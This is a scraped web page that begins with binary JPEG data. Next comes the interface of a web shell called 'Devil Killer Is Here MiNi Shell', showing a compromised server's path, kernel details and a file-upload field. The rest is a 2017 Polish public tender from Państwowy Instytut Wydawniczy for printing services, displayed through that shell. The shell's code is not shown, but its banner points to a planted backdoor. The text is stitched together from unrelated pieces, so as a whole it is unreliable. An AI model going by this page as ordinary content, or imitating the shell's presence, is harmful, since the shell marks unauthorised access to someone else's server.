JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170419/68938-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.piw.pl' target='_blank'>http://www.piw.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 68938 - 2017
              z dnia 2017-04-19 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Warszawa: USŁUGI DRUKU PUBLIKACJI WYDAWANYCH PRZEZ 
PAŃSTWOWY INSTYTUT WYDAWNICZY 
I MAŁEJ POLIGRAFII
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Państwowy Instytut Wydawniczy, krajowy numer identyfikacyjny
              366421821, ul.
              Foksal 
              17,
              00-372 
              Warszawa, woj.
              mazowieckie, państwo
              Polska, tel.
              48 22 826 02 01, 
48 22 826 02 02, e-mail
              a.mularczyk@piw.pl, faks
              48 22 826 15 36.
              <br />
              Adres strony internetowej (URL): www.piw.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: państwowa instytucja kultury</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.piw.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.piw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />oferty należy przesyłać pisemnie<br />
                Adres:
                <br />ul. Foksal 17, 00-372 Warszawa</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>USŁUGI DRUKU PUBLIKACJI WYDAWANYCH PRZEZ 
PAŃSTWOWY INSTYTUT WYDAWNICZY 
I MAŁEJ POLIGRAFII
<br /><b>Numer referencyjny: </b>1/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest usługa polegająca na druku:
1. publikacji książkowych, 2. małej poligrafii, m.in. plakatów, katalogów wydawniczych i pocztówek. - szczegółowo opisanych w SZCZEGÓŁOWYM OPISIE PRZEDMIOTU ZAMÓWIENIA, stanowiącym Załącznik Nr 2 do SIWZ.

Wykonawca będzie wykonywał sukcesywnie druk i oprawę poszczególnych publikacji lub małej poligrafii wchodzących w skład przedmiotu zamówienia na podstawie egzemplarza pozycji dostarczonego Wykonawcy w formacie .pdf na trwałym nośniku lub za pośrednictwem poczty e-mail lub platformy internetowej. 

Zamawiający oczekuje realizacji zleceń na najwyższym poziomie techniki drukarskiej, z zachowaniem najwyższych norm jakościowych produkcji (wysoką jakość przygotowania i druku, najwyższą jakość oprawy, reprodukcji ilustracji, dobór odpowiedniego papieru, pracę zgodnie ze specyfiką oraz informacjami i wytycznymi ze strony Zamawiającego), z zachowaniem terminowości przy realizowanych zleceniach.

Szczegółowy zakres zamówienia został określony w SZCZEGÓŁOWYM OPISIE PRZEDMIOTU ZAMÓWIENIA, stanowiącym Załącznik Nr 2 do SIWZ.

Zamawiający zastrzega, że liczba stron poszczególnych publikacji może różnić się +/- 10% od liczby podanych w SZCZEGÓŁOWYM OPISIE PRZEDMIOTU ZAMÓWIENIA. 

Zamawiający zastrzega, że liczba zleceń lub nakład poszczególnych rodzajów druku małej poligrafii może różnić się +/- 5 w zakresie zleceń lub 30 % w zakresie nakładu.

Wydrukowane publikacje lub mała poligrafia powinny zostać  dostarczone przez Wykonawcę do Hurtowni Dictum Sp. z o.o. przy ul. Kabaretowej 21, 00-001 Warszawa (małej poligrafii do siedziby Zamawiającego) lub w inne wskazane każdorazowo przez Zamawiającego przy zlecaniu druku poszczególnych nakładów publikacji lub małej poligrafii miejsce położone na terenie m. st. Warszawy lub okolic.

Zamówienie podzielone jest na trzy części, w tym:
1. dwie części dotyczące druku publikacji oraz 
2. jedna część dotycząca druku małej poligrafii.

Każdy wykonawca jest uprawniony złożyć ofertę na wybrane części lub na wszystkie części zamówienia. 
 
Zamawiający wymaga, zgodnie z art. 29 ust. 3a ustawy Pzp, zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących następujące czynności w zakresie realizacji zamówienia:
1. technolog montażysta,
2. technolog druku,
3. technolog introligator.
Ww. klauzula zatrudnienie nie ma zastosowania do części III zamówienia dot. druku małej poligrafii.
<br /><br /><b>II.5) Główny kod CPV: </b>79800000-2<br /><b> Dodatkowe kody CPV:</b>79810000-5,
                79820000-8,
                22100000-1<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Na podstawie art. 67 ust. 1 pkt 6 ustawy Pzp, Zamawiający przewiduje udzielenie, w okresie 3 lat od dnia udzielenia niniejszego zamówienia podstawowego, dotychczasowemu wykonawcy usług druku, zamówienia polegającego na powtórzeniu podobnych usług druku, tj. odpowiednio publikacji książkowych lub małej poligrafii i zgodnych z jego przedmiotem, na podstawie odrębnej umowy zawartej po przeprowadzeniu postępowania w trybie zamówienia z wolnej ręki.

Informacja o zamówieniu uzupełniającym została przewidziana w ogłoszeniu o zamówieniu dla niniejszego zamówienia podstawowego oraz całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości.

Stosownie do art. 67 ust. 1a ustawy Pzp, Zamawiający informuje, że ewentualny zakres usług druku w ramach zamówień uzupełniających będzie polegał na dodruku publikacji książkowych lub małej poligrafii objętych zamówieniem podstawowym, w przypadku zaistnienia takiego zapotrzebowania rynkowego oraz po cenach wynegocjowanych z wykonawcą.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/09/2017<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Zamawiający wymaga, aby druk:
1. publikacji książkowych był wykonywany sukcesywnie przez Wykonawcę na podstawie zleceń Zamawiającego w terminie do 30 września 2017 r.
2. małej poligrafii był wykonywany sukcesywnie przez Wykonawcę na podstawie zleceń Zamawiającego w terminie do 31 grudnia 2017 r. 

Zamawiający w odniesieniu do każdej publikacji książkowej będzie informował Wykonawcę o zleceniu druku określonej publikacji książkowej na 2 tygodnie przed dostarczeniem Wykonawcy plików do druku.

Druk i dostarczenie publikacji książkowej przez Wykonawcę powinien nastąpić w terminie 3 tygodni od dnia zlecenia i dostarczenia Wykonawcy przez Zamawiającego plików do druku.

Zamawiający przewiduje zlecenia Wykonawcy nie więcej niż 3 publikacji książkowych w tym samym czasie.

Zamawiający przewiduje zlecenie Wykonawcy nie więcej niż 3 druków małej poligrafii w tym samym czasie. 

Druk i dostarczenie druków małej poligrafii przez Wykonawcę powinien nastąpić w terminie 4 dni roboczych od dnia zlecenia i dostarczenia Wykonawcy przez Zamawiającego plików produkcyjnych (np. projektu druku małej poligrafii). 
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wykonawca powinien być wpisany do Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o ile wymóg taki wynika z odrębnych przepisów, lub do jednego z rejestrów zawodowych lub handlowych prowadzonych w państwie członkowskim Unii Europejskiej, w którym posiada siedzibę, określonych w załączniku XI do dyrektywy 2014/24/UE, lub spełniać inne wymogi określone w tym załączniku.
<br />
                Informacje dodatkowe
                Powyższe dot. wykonawców będących przedsiębiorcami i prowadzących działalność gospodarczą.<br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca powinien udokumentować posiadania środków finansowych lub zdolności kredytowej:
- w przypadku ubiegania się o część I w wysokości co najmniej 50 000 zł,
- w przypadku ubiegania się o część II w wysokości co najmniej 50 000 zł.

W przypadku ubiegania się o zamówienie na wykonanie części I i II Wykonawca jest zobowiązany wykazać się łącznym spełnianiem warunku dla części I i II (tj. wykazaniem się posiadaniem środków finansowych lub zdolności kredytowej w wysokości co najmniej 100 000 zł).

Zamawiający nie określa warunku w zakresie sytuacji ekonomicznej lub finansowej potencjalnego Wykonawcy części III zamówienia dot. druku małej poligrafii.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca powinien udokumentować wykonanie (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie
- w przypadku ubiegania się o część I -  co najmniej 2 (dwóch) usług druku książek w nakładzie nie mniejszym niż 700 sztuk i o liczbie stron w przypadku każdej książki nie mniejszej niż 200 stron,
- w przypadku ubiegania się o część II -  co najmniej 2 (dwóch) usług druku książek w nakładzie nie mniejszym niż 800 sztuk i o liczbie stron w przypadku każdej książki nie mniejszej niż 300 stron,
- w przypadku ubiegania się o część III  usług druku małej poligrafii o łącznej wartości nie mniejszej niż 10 000 zł.  
W przypadku ubiegania się o zamówienie na wykonanie części I i II Wykonawca jest zobowiązany wykazać się łącznym spełnianiem warunku dla części I i II (tj. wykazaniem się wykonaniem 4 (czterech) usług druku książek). 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Wykonawca powinien dysponować następującymi osobami:
1. technolog montażysta,
2. technolog druku,
3. technolog introligator.
Warunek ten ma zastosowanie w przypadku ubiegania się przez Wykonawcę o zamówienie na wykonanie zarówno którejkolwiek z części I lub II, jak również w przypadku ubiegania się o obie części.
Warunek ten nie ma zastosowania w przypadku ubiegania się tylko o część III zamówienia dot. druku małej poligrafii.

Wykaz osób będzie wymagany od wykonawcy, którego oferta zostanie oceniona przez Zamawiającego jako najkorzystniejsza.</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Dokumenty potwierdzające brak podstaw do wykluczenia z postępowania (dotyczy tylko części I i II):

1. informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

2. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, ze wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami i grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;

3. zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zwarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 

4. odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;

5. oświadczenie Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;

6. W celu oceny, czy nie zachodzą wobec innego podmiotu, o którym mowa w pkt VIII SIWZ (podmiotu trzeciego), podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 12-23 ustawy Pzp oraz pkt. 7.2.2.1 i 7.2.2.2 SIWZ (art. 24 ust. 5 pkt 1,2 i 4 ustawy Pzp), Zamawiający wymaga złożenia dotyczących tego podmiotu dokumentów, o których mowa w pkt 12.3.1.  12.3.6. SIWZ.

Oświadczenia lub dokumenty dot. Wykonawców majacych siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zostały szczegółowo określone w pkt 12.4 / odpowiednio Wykonawców wspólnie ubiegających się o zamówienie publiczne - pkt IX.

Wykonawca, którego oferta została najwyżej oceniona, nie jest obowiązany do złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy Pzp (oświadczenia lub dokumenty niezbędne do przeprowadzenia postępowania potwierdzające: (1) spełnianie warunków udziału w postępowaniu lub (2) brak podstaw do wykluczenia), jeżeli Zamawiający:

a) posiada oświadczenia lub dokumenty dotyczące tego Wykonawcy lub
b) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014 r. poz. 1114 oraz z 2016 r. poz. 352). 
 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Dokumenty potwierdzające spełnianie warunków udziału w postępowaniu:

1. odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;

2. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich nakładu i liczby stron książki (w przypadku części I lub II dot. publikacji książkowych) albo wartości (w przypadku części III dot. druku małej poligrafii), przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie (obowiązek załączenia dowodów nie dotyczy części III dot. druku małej poligrafii); 
przy czym dowodami, o których mowa powyżej, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (załącznik nr 7 do SIWZ);

3. wykaz osób dostępnych wykonawcy w celu wykonania zamówienia publicznego (dotyczy części I i II) wraz z informacją o podstawie dysponowania tymi zasobami  wykaz sprzętu (załącznik nr 8 do SIWZ);

4. informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej (dotyczy części I i II) potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert;

5. Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć dokumentów dotyczących sytuacji finansowej lub ekonomicznej wymaganych powyżej przez Zamawiającego, może złożyć inny dokument, który w wystarczający sposób potwierdzi spełnianie opisanego przez Zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej.

6. Jeżeli Wykonawca, wykazując spełnianie warunków udziału w postępowaniu, o których mowa w pkt. 7.3 SIWZ polega na zasobach innych podmiotów, na zasadach określonych w art. 22a ustawy Pzp, Zamawiający w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów, które określają w szczególności:
a) zakres dostępnych Wykonawcy zasobów innego podmiotu,
b) sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego,
